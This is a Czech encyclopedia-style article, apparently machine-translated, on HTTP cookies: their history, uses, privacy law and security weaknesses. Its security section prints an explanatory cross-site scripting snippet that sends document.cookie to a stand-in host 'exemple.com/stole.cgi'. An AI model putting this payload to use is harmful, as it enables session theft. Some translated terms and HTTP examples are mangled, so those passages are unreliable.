in Definice, Wiki

Internetový cookie: co to je? Definice, původy, typy a soukromí

Jaká je role cookie, co to je a jaké jsou typy souborů cookie? 🍪

56.3 Zobrazení 384 Hlasy

Internetový cookie: co to je? Definice, původy, typy a soukromí
Internetový cookie: co to je? Definice, původy, typy a soukromí

Un cookie nebo web cookie (nebo cookie, zkráceně jako svědek v Quebecu) je definován komunikačním protokolem HTTP jako sekvence informací zasílaných HTTP serverem HTTP klientovi, který tento vrací pokaždé, když je za určitých podmínek dotazován stejný HTTP server.

Soubor cookie je ekvivalentem a malý textový soubor uložený na terminálu uživatele internetu. Existují již více než 20 let a umožňují vývojářům webových stránek ukládat uživatelská data za účelem usnadnění jejich navigace a umožnění určitých funkcí. Soubory cookie byly vždy více či méně kontroverzní, protože obsahují zbytkové osobní informace, které mohou být potenciálně zneužity třetími stranami.

Webový server jej odesílá jako HTTP hlavičku do webového prohlížeče, který jej vrací beze změny při každém přístupu na server. Soubor cookie lze použít k autentizace, sezení (údržba státu) a pro ukládat konkrétní informace o uživateli, jako jsou preference stránek nebo obsah elektronického nákupního košíku. Termín cookie je odvozen od kouzelná sušenka, dobře známý koncept v UNIX computingu, který inspiroval myšlenku a název souborů cookie prohlížeče. Existuje několik alternativ k souborům cookie, z nichž každá má své vlastní použití, výhody a nevýhody.

Protože se jedná o jednoduché textové soubory, soubory cookie nejsou spustitelné. Nejsou ani spyware, ani viry, ačkoli soubory cookie z některých stránek jsou detekovány mnoha antivirovými programy, protože umožňují sledování uživatelů, když navštíví více stránek. 

Většina moderních prohlížečů to uživatelům umožňuje rozhodnout, zda soubory cookie přijmout nebo odmítnout. Uživatelé mohou také zvolit, jak dlouho budou cookies uloženy. Úplné odmítnutí cookies však činí některé stránky nepoužitelnými. Například ukládejte nákupní košíky nebo stránky, které vyžadují přihlášení pomocí přihlašovacích údajů (uživatelského jména a hesla).

Obsah

historický

Termín sušenka pochází z anglického výrazu kouzelná sušenka, což je paket dat, který program přijímá a vrací beze změny. Soubory cookie byly v IT používány již tehdy Lou Montulli napadlo je použít ve webové komunikaci v červnu 1994. V té době byl zaměstnán ve společnosti Netscape Communications, která pro klienta vyvinula aplikaci pro e-commerce. Soubory cookie poskytly řešení problému spolehlivosti implementace virtuálního nákupního košíku obchodu.

John Giannandrea a Lou Montulli napsali ve stejném roce první specifikaci souborů cookie Netscape. Verze 0.9 beta Mosaic Netscape, vydaná 13. října 1994, integrovaná cookie technologie (viz příspěvek). Prvním (neexperimentálním) použitím souborů cookie bylo zjistit, zda návštěvníci webu Netscape navštívili web již dříve. Společnost Montulli podala patentovou přihlášku na technologii cookies v roce 1995 a byl udělen americký patent 5774670. udělena v roce 1998.

Po implementaci do Netscape 0.9 beta v roce 1994 byly cookies integrovány do Internet Exploreru 2, vydaného v říjnu 1995.

Zavedení cookies zatím není veřejnosti příliš známé. Konkrétně cookies byly standardně přijímány v nastavení prohlížeče a uživatelé nebyli informováni o jejich přítomnosti. Někteří lidé věděli o existenci cookies kolem prvního čtvrtletí roku 1995, ale široká veřejnost se o jejich existenci začala zajímat až poté, co Financial Times publikovaly článek 12. února 1996. Ve stejném roce se cookies dostalo velké pozornosti médií kvůli možnému narušení soukromí. Téma cookies bylo diskutováno na dvou konzultacích Americké federální obchodní komise v letech 1996 a 1997.

Vývoj oficiální specifikace cookies již probíhal. První diskuse o oficiální specifikaci proběhly v dubnu 1995 na mailing listu www-talk. Byla vytvořena speciální pracovní skupina IETF. Brian Behlendorf a David Kristol navrhli dva alternativní návrhy na zavedení státních transakcí do HTTP, ale skupina vedená Kristolem samotným se rozhodla použít jako výchozí bod specifikaci Netscape. V únoru 1996 pracovní skupina zjistila, že soubory cookie třetích stran představují významnou hrozbu pro soukromí. Specifikace vytvořená skupinou byla nakonec zveřejněna jako RFC 2109.

Od konce roku 2014 vidíme na mnoha stránkách banner o cookies. Existuje alespoň jedno rozšíření prohlížeče, které umožňuje banner se nezobrazuje.

Typy souborů cookie a použití

Správa relace

Soubory cookie lze použít k uchování uživatelských dat během navigace, ale také při více návštěvách. Soubory cookie byly zavedeny, aby poskytly prostředek pro implementaci elektronických nákupních košíků, virtuálního zařízení, ve kterém může uživatel shromažďovat položky, které chce koupit, při procházení webu.

V dnešní době aplikace jako nákupní košíky místo toho ukládají seznam položek do databáze na serveru, což je vhodnější; než je uložit do samotného cookie. Webový server odešle cookie obsahující jedinečné ID relace. Webový prohlížeč pak vrátí toto ID relace při každém dalším požadavku a položky v košíku se uloží a přiřadí ke stejnému jedinečnému ID relace.

Časté používání souborů cookie je užitečné pro přihlášení na stránky pomocí přihlašovacích údajů. Stručně řečeno, webový server nejprve odešle cookie obsahující jedinečné ID relace. Poté uživatelé poskytnou své přihlašovací údaje (obvykle uživatelské jméno a heslo). Webová aplikace pak ověří relaci a umožní uživateli přístup ke službě.

personalizace

Soubory cookie lze použít k zapamatování informací o uživateli stránky, aby se mu v budoucnu zobrazoval vhodný obsah. Webový server může například odeslat soubor cookie obsahující poslední uživatelské jméno použité k přihlášení k dané webové stránce, takže uživatelské jméno může být předvyplněno při budoucích návštěvách.

Mnoho webových stránek používá cookies pro personalizaci na základě uživatelských preferencí. Uživatelé si ve formuláři vyberou své preference a odešlou je na server. Server zakóduje preference do souboru cookie a odešle je zpět do prohlížeče. Následně pokaždé, když uživatel vstoupí na stránku tohoto webu, prohlížeč vrátí cookie a tedy seznam preferencí; server pak může upravit stránku podle preferencí uživatele. Například webová stránka Wikipedie umožňuje svým uživatelům vybrat si vzhled webu, který preferují. Vyhledávač Google umožňuje svým uživatelům (i když nejsou registrováni) zvolit počet výsledků, které chtějí vidět na každé stránce s výsledky.

Sledování

Sledovací soubory cookie se používají ke sledování zvyklostí uživatelů internetu při prohlížení. To lze také částečně provést pomocí IP adresy počítače, který žádá o stránku, nebo pomocí „referrer“ HTTP hlavičky, kterou klient odesílá s každým požadavkem, ale soubory cookie umožňují větší přesnost. To lze provést jako v následujícím příkladu:

  1. Pokud uživatel vyvolá stránku na webu a požadavek neobsahuje soubor cookie, server předpokládá, že se jedná o první stránku, kterou uživatel navštívil. Server poté vytvoří náhodný řetězec a odešle jej do prohlížeče spolu s požadovanou stránkou.
  2. Od této chvíle bude cookie automaticky zasílána prohlížečem při každém vyvolání nové stránky webu. Server odešle stránku jako obvykle, ale také zaznamená adresu URL volané stránky, datum, čas požadavku a soubor cookie do souboru protokolu.

Pohledem do log souboru je pak možné zjistit, které stránky uživatel navštívil a v jakém pořadí. Pokud například soubor obsahuje několik požadavků vytvořených pomocí souboru cookie id=abc, může to stanovit, že všechny tyto požadavky pocházejí od stejného uživatele. Požadovaná adresa URL, datum a čas související s požadavky umožňují sledování procházení uživatele.

Soubory cookie a webové majáky třetích stran, vysvětlené níže, navíc umožňují sledování na různých webech. Sledování jednoho webu se obecně používá pro statistické účely. Naproti tomu sledování napříč různými stránkami pomocí souborů cookie třetích stran je obecně využíváno reklamními společnostmi k vytváření anonymních uživatelských profilů (které se pak používají k určení, které reklamy by se měly uživateli zobrazit, a také k zasílání e-mailů odpovídajících těmto reklamám — SPAM ).

Sledovací soubory cookie představují riziko narušení soukromí uživatele, ale lze je snadno smazat. Většina moderních prohlížečů obsahuje možnost automaticky odstranit trvalé soubory cookie při ukončení aplikace.

Soubory cookie třetích stran

Obrázky a další objekty obsažené na webové stránce mohou být umístěny na jiných serverech, než je server, který stránku hostí. Pro zobrazení stránky prohlížeč stáhne všechny tyto objekty. Většina webových stránek obsahuje informace z různých zdrojů. Pokud například zadáte do prohlížeče www.example.com, na části stránky se často objeví objekty nebo reklamy, které pocházejí z různých zdrojů, tj. z jiné domény než www. .example.com. Cookies „první“ strany jsou soubory cookie, které nastavuje doména uvedená v adresním řádku prohlížeče. Soubory cookie třetích stran nastavuje jeden z objektů stránky, který pochází z jiné domény.

Ve výchozím nastavení přijímají prohlížeče jako Mozilla Firefox, Microsoft Internet Explorer a Opera soubory cookie třetích stran, ale uživatelé mohou změnit nastavení v možnostech prohlížeče a zablokovat je. Soubory cookie třetích stran, které umožňují webové funkce, nepředstavují žádné bezpečnostní riziko, ale používají se také ke sledování uživatelů. z místa na místo.

Nástroje jako Ghostery dostupné pro všechny prohlížeče včetně Google Chrome mohou blokovat výměny mezi třetími stranami.

Implementace

Možná interakce mezi webovým prohlížečem a serverem hostujícím webovou stránku. Server odešle cookie do prohlížeče a prohlížeč jej odešle zpět, když zavolá jinou stránku.
Možná interakce mezi webovým prohlížečem a serverem hostujícím webovou stránku. Server odešle cookie do prohlížeče a prohlížeč jej odešle zpět, když zavolá jinou stránku.

Cookies jsou malé kousky dat zasílané webovým serverem do prohlížeče. Prohlížeč je vrátí nezměněné na server a zavede stav (paměť minulých událostí) do jinak bezstavové transakce HTTP. Bez souborů cookie je každé načtení webové stránky nebo součásti webové stránky izolovanou událostí, nezávislou na jiných požadavcích zaslaných na stejný web. Kromě toho, že je lze nastavit webovým serverem, mohou být soubory cookie nastaveny také skriptovacími jazyky, jako je JavaScript, pokud je prohlížeč podporuje a autorizuje.

Oficiální specifikace souborů cookie naznačuje, že prohlížeče by měly být schopny uložit a znovu odeslat minimální počet souborů cookie. Konkrétně by prohlížeč měl být schopen uložit alespoň 300 souborů cookie o velikosti čtyř kilobajtů a alespoň 20 souborů cookie pro jeden server nebo doménu.

Podle oddílu 3.1 RFC 2965, názvy souborů cookie nerozlišují malá a velká písmena.

Soubor cookie může určit datum vypršení platnosti, v takovém případě bude soubor cookie k tomuto datu smazán. Pokud soubor cookie neuvádí datum vypršení platnosti, soubor cookie se vymaže, jakmile uživatel opustí svůj prohlížeč. Zadání data vypršení platnosti je proto způsob, jak zajistit, aby cookie přežilo více relací. Z tohoto důvodu se říká, že cookies s datem vypršení platnosti jsou vytrvalý. Příklad aplikace: maloobchodní web může používat trvalé soubory cookie k zaznamenání položek, které uživatelé vložili do nákupního košíku (ve skutečnosti může soubor cookie odkazovat na záznam uložený v databázi na webu prodeje, a nikoli ve vašem počítači) . Tímto způsobem, pokud uživatelé opustí svůj prohlížeč, aniž by provedli nákup, a vrátí se k němu později, budou moci znovu najít položky v košíku. Pokud by tyto soubory cookie neuváděly datum vypršení platnosti, jejich platnost by vypršela při zavření prohlížeče a informace o obsahu košíku by byly ztraceny.

Soubory cookie mohou být omezeny na určitou doménu, subdoménu nebo cestu na serveru, který je vytvořil.

Přenos webových stránek se provádí pomocí HyperText Transfer Protocol (HTTP). Ignorováním souborů cookie prohlížeče zavolají stránku z webových serverů tak, že jim obecně pošlou krátký text s názvem HTTP požadavek. Například pro přístup na stránku www.example.org/index.html se prohlížeče připojí k serveru www.example.org a odešlou požadavek, který vypadá takto:

GET /index.html HTTP/1.1Host: www.example.org
navigátorServeur

Server odpoví odesláním požadované stránky, které předchází podobný text, zavolá se celá HTTP odpověď. Tento paket může obsahovat řádky, které instruují prohlížeč k ukládání cookies:

HTTP/1.1 200 OKContent-type: text/htmlSet-Cookie: name=value
(stránka HTML)
navigátorServeur

Server odešle řádek Set-Cookie pouze v případě, že server chce, aby prohlížeč uložil cookie. Set-Cookie je požadavek, aby prohlížeč uložil řetězec name=value a vrátil jej ve všech budoucích požadavcích na server. Pokud prohlížeč podporuje soubory cookie a soubory cookie jsou povoleny v možnostech prohlížeče, bude soubor cookie zahrnut do všech následujících požadavků odeslaných na stejný server. Prohlížeč například zavolá stránku www.example.org/news.html odesláním následujícího požadavku na server www.example.org:

GET /news.html HTTP/1.1Host: www.example.orgCookie: name=valueAccept: */*
navigátorServeur

Toto je požadavek na jinou stránku ze stejného serveru a liší se od první stránky, protože obsahuje řetězec, který server dříve odeslal prohlížeči. Díky tomu server ví, že tento požadavek je propojen s předchozím. Server odpoví odesláním volané stránky a také přidáním dalších cookies.

Hodnotu cookie může server změnit odesláním nového řádku Set-Cookie: name=new_value jako odpověď na volanou stránku. Prohlížeč poté nahradí starou hodnotu novou.

Řádek Set-Cookie je obvykle vytvořen programem CGI nebo jiným skriptovacím jazykem, nikoli serverem HTTP. HTTP server (příklad: Apache) pouze přenese výsledek programu (dokument, kterému předchází hlavička obsahující soubory cookie) do prohlížeče.

Soubory cookie lze také nastavit pomocí JavaScriptu nebo jiných podobných jazyků spuštěných v prohlížeči, tedy na straně klienta spíše než na straně serveru. V JavaScriptu se k tomuto účelu používá objekt document.cookie. Například příkaz document.cookie = "teplota=20" vytvoří soubor cookie s názvem "teplota" a s hodnotou 20.

Příklad HTTP odpovědi z google.com, která nastavuje soubor cookie s atributy.
Příklad HTTP odpovědi z google.com, která nastavuje soubor cookie s atributy.

Kromě dvojice název/hodnota může cookie obsahovat také datum vypršení platnosti, cestu, název domény a typ zamýšleného připojení, tedy normální nebo šifrované. RFC 2965 také definuje, že soubory cookie musí mít povinné číslo verze, ale to se obecně vynechává. Tyto datové části následují za párem name=new_value a jsou odděleny středníky. Soubor cookie může například vytvořit server odesláním řádku Set-Cookie: name=new_value; expires=datum; cesta=/; doména=.example.org.

Soubory cookie vyprší a prohlížeč je neodešle na server v následujících situacích:

  • Při zavření prohlížeče, pokud soubor cookie není trvalý.
  • Když vyprší datum vypršení platnosti cookie.
  • Když se datum vypršení platnosti cookie změní (serverem nebo skriptem) na datum v minulosti.
  • Když prohlížeč smaže cookie na žádost uživatele.

Třetí situace umožňuje serverům nebo skriptům explicitně odstranit cookie. Upozorňujeme, že pomocí webového prohlížeče Google Chrome je možné zjistit datum vypršení platnosti konkrétního souboru cookie v nastavení obsahu. Soubor cookie uložený v počítači tam může velmi dobře zůstat několik desetiletí, pokud není podniknut žádný postup k jeho vymazání.

Stereotypy

Od jejich zavedení na internet kolovalo na internetu a v médiích mnoho myšlenek o cookies. V roce 1998 CIAC, tým pro monitorování počítačových incidentů Ministerstva energetiky Spojených států amerických, zjistil, že zranitelnosti zabezpečení souborů cookie „v podstatě neexistují“ a vysvětlil, že „informace o původu vašich návštěv a podrobnosti o webových stránkách, které jste navštívili již existují v souborech protokolu webových serverů“. V roce 2005 zveřejnil Jupiter Research výsledky studie, ve které značné procento respondentů zvažovalo následující tvrzení:

  • Cookies jsou jako virus, infikují pevné disky uživatelů.
  • Vytvářejí se soubory cookie pop-up.
  • K odesílání se používají soubory cookie spam.
  • Cookies se používají pouze pro reklamu.

Soubory cookie nemohou vymazat ani číst informace z počítače uživatele. Soubory cookie však umožňují detekovat webové stránky navštívené uživatelem na daném webu nebo skupině webů. Tyto informace lze shromažďovat v uživatelském profilu, který lze použít nebo dále prodat třetím stranám, což může představovat vážné problémy s ochranou soukromí. Některé profily jsou anonymní v tom smyslu, že neobsahují žádné osobní údaje, ale i takové profily mohou být sporné.

Podle stejné studie velké procento uživatelů internetu neví, jak soubory cookie smazat. Jedním z důvodů, proč lidé nedůvěřují souborům cookie, je to, že některé stránky zneužily aspekt osobních údajů souborů cookie a sdílely tyto informace s jinými zdroji. Velké procento cílené reklamy a nevyžádaných e-mailů, považovaných za spam, pochází z informací získaných ze sledovacích souborů cookie.

Nastavení prohlížeče

Většina prohlížečů podporuje soubory cookie a umožňuje uživateli je zakázat. Nejběžnější možnosti jsou:

  • Úplně povolte nebo zakažte soubory cookie, aby byly neustále přijímány nebo blokovány.
  • Umožněte uživateli vidět aktivní soubory cookie na dané stránce zadáním javascript: alert(document.cookie) do adresního řádku prohlížeče. Některé prohlížeče obsahují správce souborů cookie pro uživatele, který může prohlížet a selektivně mazat soubory cookie aktuálně uložené prohlížečem.

Většina prohlížečů také umožňuje úplné vymazání osobních údajů, včetně souborů cookie. Existují také další moduly pro kontrolu oprávnění pro soubory cookie.

Soukromí a soubory cookie třetích stran

V tomto fiktivním příkladu reklamní společnost umístila bannery na dvě webové stránky. Hostováním bannerů na svých serverech a používáním souborů cookie třetích stran je reklamní společnost schopna sledovat navigaci uživatele na těchto dvou stránkách.

Soubory cookie mají důležité důsledky pro soukromí a anonymitu uživatelů webu. Přestože se soubory cookie odesílají zpět pouze na server, který je nastavil, nebo na server patřící do stejné internetové domény, webová stránka však může obsahovat obrázky nebo jiné součásti uložené na serverech patřících do jiných domén. Jsou volány soubory cookie, které se nastavují během obnovy těchto externích součástí cookies třetích stran. To zahrnuje soubory cookie z nežádoucích vyskakovacích oken.

Reklamní společnosti používají soubory cookie třetích stran ke sledování uživatelů na různých webech, které navštěvují. Inzertní společnost může zejména sledovat uživatele na všech stránkách, kam umístila reklamní obrázky nebo sledovací pixel. Znalost stránek navštěvovaných uživatelem umožňuje reklamní společnosti zacílit na reklamní preference uživatele.

Schopnost vytvořit uživatelský profil je některými považována za narušení soukromí, zejména pokud se sledování provádí v různých doménách pomocí souborů cookie třetích stran. Z tohoto důvodu mají některé země právní předpisy týkající se souborů cookie.

Vláda Spojených států zavedla přísná pravidla pro umisťování souborů cookie v roce 2000 poté, co vyšlo najevo, že Úřad pro drogovou politiku Bílého domu používal soubory cookie ke sledování počítačů uživatelů, kteří si prohlížejí online reklamy na drogy. V roce 2002 aktivista za ochranu soukromí Daniel Brandt zjistil, že CIA ponechala trvalé soubory cookie na počítačích, které navštívily její webové stránky. Jakmile byla CIA informována o tomto porušení, prohlásila, že tyto soubory cookie nebyly odeslány úmyslně, a přestala je nastavovat. 25. prosince 2005 Brandt zjistil, že Národní bezpečnostní agentura (NSA) nechala na počítačích návštěvníků dva trvalé soubory cookie kvůli aktualizaci softwaru. Po upozornění NSA okamžitě zakázala cookies.

Ve Spojeném království, Zákon o cookies “, vstoupila v platnost dne 25. května 2012, zavazuje stránky, aby oznámily své záměry, a umožňují tak uživatelům vybrat si, zda chtějí či nechtějí zanechat stopy svého průchodu na internetu. Mohou tak být chráněni před cílením reklamy. Nicméně, podle Guardian, souhlas uživatelů internetu není nutně výslovný; byly provedeny změny v podmínkách souhlasu uživatele, čímž se stal takto naznačeno.

Směrnice 2002/58 o soukromí

Směrnice 202/58 o ochraně soukromí a elektronických komunikacích obsahuje pravidla pro používání souborů cookie. Zejména článek 5, odstavec 3 této směrnice vyžaduje, aby ukládání dat (jako jsou soubory cookie) v počítači uživatele bylo možné pouze v případě, že:

  • uživatel je informován o tom, jak jsou data využívána;
  • uživatel má možnost tuto operaci ukládání odmítnout. Tento článek však také uvádí, že uchovávání údajů z technických důvodů je z tohoto zákona vyjmuto.

Směrnice, která měla být implementována od října 2003, byla však jen velmi nedokonale uvedena do praxe podle zprávy z prosince 2004, která rovněž poukázala na to, že některé členské státy (Slovensko, Lotyšsko, Řecko, Belgie a Lucembursko) dosud neprovedly směrnice do vnitrostátního práva.

Podle stanoviska G29 z roku 2010 je tato směrnice, která zejména podmiňuje používání cookies pro účely behaviorální reklamy, výslovným souhlasem uživatele internetu, nadále velmi špatně uplatňována. Ve skutečnosti tak většina stránek činí způsobem, který není v souladu se směrnicí, a to tím, že se omezují na jednoduchý „banner“ informující o používání „cookies“, aniž by uváděly informace o použití, aniž by rozlišovaly mezi „technickými“ soubory cookie. „sledovací“ soubory cookie, ani nabídnout skutečnou volbu uživateli, který si přeje zachovat technické soubory cookie (jako jsou soubory cookie pro správu nákupního košíku) a odmítnout soubory cookie pro sledování. Ve skutečnosti mnoho stránek nefunguje správně, pokud jsou cookies odmítnuty, což není v souladu se směrnicí 2002/58 nebo směrnicí 95/46 (Ochrana osobních údajů).

Směrnice 2009 / 136 / CE

Tento materiál byl aktualizován směrnicí 2009/136/ES ze dne 25. listopadu 2009, která uvádí, že „ukládání informací nebo získávání přístupu k již uloženým informacím v koncovém zařízení účastníka nebo uživatele je povoleno pouze za podmínky, že účastník nebo uživatel udělil svůj souhlas poté, co v souladu se směrnicí 95/46/ES obdržel mezi ostatními jasné a úplné informace o účelech zpracování“. Nová směrnice proto posiluje povinnosti před umístěním cookies na počítač uživatele internetu.

V předběžných úvahách o směrnici však evropský zákonodárce upřesňuje: „Pokud je to technicky možné a účinné, v souladu s příslušnými ustanoveními směrnice 95/46/ES může být souhlas uživatele s ohledem na zpracování vyjádřen prostřednictvím použití příslušného nastavení prohlížeče nebo jiné aplikace“. Ve skutečnosti však dosud žádný prohlížeč neumožňuje oddělit základní technické soubory cookie od nepovinných, které by měly být ponechány na volbě uživatele.

Tato nová směrnice byla transponována belgickými poslanci v červenci 2012. Studie z roku 2014 ukazuje, že i poslanci mají potíže s uplatňováním omezení směrnice.

P3P

Specifikace P3P zahrnuje schopnost serveru uvést zásady ochrany osobních údajů, které definují, jaký druh informací shromažďuje a za jakým účelem. Tyto zásady zahrnují (ale nejsou omezeny na) používání informací shromážděných pomocí souborů cookie. Podle definic P3P může prohlížeč přijmout nebo odmítnout soubory cookie porovnáním zásad ochrany osobních údajů s preferencemi uživatele nebo dotazem uživatele a předložením prohlášení o zásadách ochrany osobních údajů deklarovaných serverem.

Mnoho prohlížečů, včetně Apple Safari a Microsoft Internet Explorer verze 6 a 7, podporuje P3P, což prohlížeči umožňuje určit, zda přijme ukládání souborů cookie třetích stran. Prohlížeč Opera umožňuje uživatelům odmítnout soubory cookie třetích stran a vytvořit globální a specifický bezpečnostní profil pro internetové domény. Mozilla Firefox verze 2 zrušil podporu P3P, ale obnovil ji ve verzi 3.

Soubory cookie třetích stran může většina prohlížečů zablokovat za účelem zvýšení soukromí a omezení sledování reklam, aniž by to negativně ovlivnilo webovou zkušenost uživatele. Mnoho reklamních agentur nabízí možnost odhlásit se k cílené reklamě, nastavením generického souboru cookie v prohlížeči, který toto cílení deaktivuje, ale takové řešení není prakticky účinné, pokud je respektováno, protože tento generický soubor cookie je vymazán, jakmile uživatel tyto soubory cookie smaže, čímž se zruší volba mimo rozhodnutí.

Nevýhody cookies

Kromě problémů s ochranou soukromí mají soubory cookie také některé technické nevýhody. Zejména ne vždy přesně identifikují uživatele, ve velkém počtu mohou zpomalit výkon webu, mohou být použity pro bezpečnostní útoky a jsou v rozporu s reprezentativním přenosem stavu, architektonickým stylem softwaru.

Nepřesná identifikace

Pokud je na počítači používáno více prohlížečů, v každém z nich je vždy samostatná úložná jednotka pro soubory cookie. Cookies tedy neidentifikují osobu, ale kombinaci uživatelského účtu, počítače a webového prohlížeče. Každý tedy může používat tyto účty, počítače nebo prohlížeče, které mají soubor cookies. Podobně soubory cookie nerozlišují mezi více uživateli, kteří sdílejí stejný uživatelský účet, počítač a prohlížeč, jako například v „internetových kavárnách“ nebo na jakémkoli místě, které poskytuje bezplatný přístup k počítačovým zdrojům.

V praxi se však toto tvrzení ve většině případů ukazuje jako mylné, protože dnes „osobní“ počítač (nebo chytrý telefon, či tablet, což je horší) používá převážně jeden jedinec, což se rovná cílení na konkrétní osobu a prostřednictvím objemu shromážděných informací dospět k personalizovanému zacílení, i když osoba není „jmenovitě“ identifikována.

Soubor cookie může být odcizen jiným počítačem v síti.

Během normálního provozu jsou soubory cookie zasílány zpět mezi serverem (nebo skupinou serverů ve stejné doméně) a prohlížečem počítače uživatele. Vzhledem k tomu, že soubory cookie mohou obsahovat citlivé informace (uživatelské jméno, heslo používané pro ověřování atd.), jejich hodnoty by neměly být přístupné jiným počítačům. Krádež cookies je akt zachycení cookies neoprávněnou třetí stranou.

Soubory cookie mohou být ukradeny pomocí snifferu paketů v útoku zvaném session hijacking. Provoz na síti mohou zachycovat a číst jiné počítače než ty, které odesílají a přijímají (zejména na nešifrovaném veřejném prostoru Wi-Fi). Tento provoz zahrnuje soubory cookie odeslané přes relace pomocí prostého protokolu HTTP. Pokud síťový provoz není šifrován, mohou uživatelé se zlými úmysly číst komunikaci ostatních uživatelů v síti pomocí „snifferů paketů“.

Tento problém lze vyřešit šifrováním spojení mezi počítačem uživatele a serverem pomocí protokolu HTTPS. Server může specifikovat a bezpečná vlajka při nastavování cookie; prohlížeč jej odešle pouze přes zabezpečenou linku, jako je připojení SSL.

Nicméně mnoho webů, i když používají k ověření uživatele šifrovanou komunikaci HTTPS (tj. přihlašovací stránku), později z důvodů efektivity odesílá soubory cookie relace a další data jako obvykle prostřednictvím nešifrovaných připojení HTTP. Útočníci tak mohou zachytit soubory cookie jiných uživatelů a vydávat se za ně na příslušných stránkách nebo je použít při útocích na soubory cookie.

Skriptování na webu: soubor cookie, který by měl být vyměňován pouze mezi serverem a klientem, je odeslán jiné třetí straně.

Dalším způsobem, jak ukrást soubory cookie, je skriptovat stránky a nechat prohlížeč sám odesílat soubory cookie na škodlivé servery, které je nikdy nepřijímají. Moderní prohlížeče umožňují spouštění hledaných částí kódu ze serveru. Pokud jsou soubory cookie přistupovány za běhu, jejich hodnoty mohou být v určité formě sděleny serverům, které by k nim neměly přistupovat. Zašifrování souborů cookie před jejich odesláním přes síť nepomáhá zmařit útok.

Tento typ skriptování na webu obvykle používají útočníci na webech, které uživatelům umožňují zveřejňovat obsah HTML. Začleněním části kompatibilního kódu do příspěvku HTML může útočník přijímat soubory cookie od jiných uživatelů. Znalost těchto souborů cookie lze využít připojením ke stejné stránce pomocí odcizených souborů cookie, a tak být rozpoznán jako uživatel, jehož soubory cookie byly odcizeny.

Jedním ze způsobů, jak takovým útokům předejít, je použít příznak HttpOnly; je to možnost zavedená od verze 6 Internet Exploreru v PHP od verze 5.2.0, která je plánována tak, aby byla cookie pro klienta v blízkosti skriptu nepřístupná. Weboví vývojáři by to však měli vzít v úvahu při vývoji svých stránek, aby byli imunní vůči skriptování na webu.

Další používanou bezpečnostní hrozbou je vytváření poptávky na webu.

Oficiální technická specifikace umožňuje zasílat soubory cookie zpět pouze na servery v doméně, ze které pocházejí. Hodnota cookies však může být odeslána na jiné servery pomocí jiných prostředků, než jsou hlavičky cookies.

Zejména skriptovací jazyky jako JavaScript mají obecně povolen přístup k hodnotám souborů cookie a jsou schopny odesílat libovolné hodnoty na jakýkoli server na internetu. Tato schopnost skriptování se používá z webových stránek, které uživatelům umožňují zveřejňovat obsah HTML, aby si jej mohli prohlédnout ostatní uživatelé.

Útočník působící na doméně example.com by například mohl odeslat komentář obsahující následující odkaz odkazující na oblíbený blog, který jinak neovládá:

<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>

Když na tento odkaz klikne jiný uživatel, prohlížeč spustí část kódu s atributem onclick, takže nahradí řetězec document.cookie seznamem uživatelských souborů cookie, které jsou pro tuto stránku aktivní. Tento seznam souborů cookie je tedy odeslán na server example.com a útočník tak může sbírat soubory cookie tohoto uživatele.

Tento typ útoku je obtížné odhalit na straně uživatele, protože skript pochází ze stejné domény, která nastavila soubor cookie, a operace odesílání hodnot se zdá být autorizována touto doménou. Má se za to, že je odpovědností správců provozujících tento typ stránek zavést omezení bránící zveřejnění škodlivého kódu.

Soubory cookie nejsou přímo viditelné pro programy na straně klienta, jako je JavaScript, pokud byly odeslány s příznakem HttpOnly. Z pohledu serveru je jediný rozdíl v tom, že do řádku hlavičky Set-Cookie je přidáno nové pole obsahující řetězec HttpOnly:

Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly

Když prohlížeč obdrží takový soubor cookie, předpokládá se, že jej normálně použije v následující výměně HTTP, ale aniž by byl viditelný pro skripty spouštěné na straně klienta. Příznak HttpOnly není součástí žádné oficiální technické specifikace a není implementován ve všech prohlížečích. Všimněte si, že v současné době neexistuje žádný způsob, jak zabránit čtení a zápisu souborů cookie relace metodou XMLHTTPRequest.

Úprava obsahu: Útočník odešle serveru neplatný soubor cookie, pravděpodobně vytvořený z platného cookie odeslaného serverem.

Jakmile je třeba soubory cookie uložit a vrátit beze změny na server, může útočník změnit hodnotu souborů cookie před jejich odesláním zpět na server. Pokud například cookie obsahuje celkovou hodnotu, kterou musí uživatel zaplatit za položky vložené do nákupního košíku obchodu, změna této hodnoty vystavuje server riziku, že útočníkovi bude účtovat méně, než je počáteční cena. Proces úpravy hodnoty cookies se nazývá otrava sušenkami a lze je použít po krádeži souborů cookie, aby byl útok trvalý.

V metodě přepisování souborů cookie útočník zneužije závadu prohlížeče k odeslání neplatného souboru cookie na server.

Většina webových stránek však ukládá pouze ID relace – náhodně vygenerované jedinečné číslo používané k identifikaci uživatele relace – v samotném cookie, zatímco všechny ostatní informace jsou uloženy na serveru. V tomto případě je tento problém z velké části vyřešen.

Očekává se, že každý web bude mít své vlastní soubory cookie, takže jeden web by neměl mít možnost upravovat nebo vytvářet soubory cookie spojené s jiným webem. Chyba zabezpečení webového prohlížeče může umožnit škodlivým webům toto pravidlo porušit. Využití takové chyby se běžně nazývá vaření na různých místech. Účelem takových útoků může být krádež ID relace.

Uživatelé by měli používat nejnovější verze webových prohlížečů, ve kterých jsou tyto zranitelnosti prakticky eliminovány.

Konfliktní stav mezi klientem a serverem

Používání souborů cookie může způsobit rozpor mezi stavem klienta a stavem uloženým v cookie. Pokud uživatel získá cookie a klikne na tlačítko „Zpět“ prohlížeče, stav prohlížeče obecně není stejný jako před tímto akvizicí. Pokud je například košík internetového obchodu vytvořen pomocí souborů cookie, obsah košíku se nemůže změnit, když se uživatel vrátí do historie prohlížeče: pokud uživatel stiskne tlačítko pro přidání článku do košíku a klikne na tlačítko „Vrátit ", článek zůstane v tomto. To nemusí být záměr uživatele, který určitě chce přidání článku zrušit. To může vést k nespolehlivosti, zmatkům a chybám. Weboví vývojáři by si tedy měli být tohoto problému vědomi a zavést opatření k řešení situací, jako je tato.

Trvalé soubory cookie byly kritizovány odborníky na zabezpečení ochrany soukromí za to, že jejich platnost nevyprší dostatečně brzy, což webovým stránkám umožňuje sledovat uživatele a budovat jejich profil v průběhu času. Tento aspekt souborů cookie je také součástí problému únosu relace, protože ukradený trvalý soubor cookie může být používán k vydávání se za uživatele po značnou dobu.

Přečíst také: GAFAM: Kdo jsou? Proč jsou (někdy) tak děsivé?

Alternativy k cookies

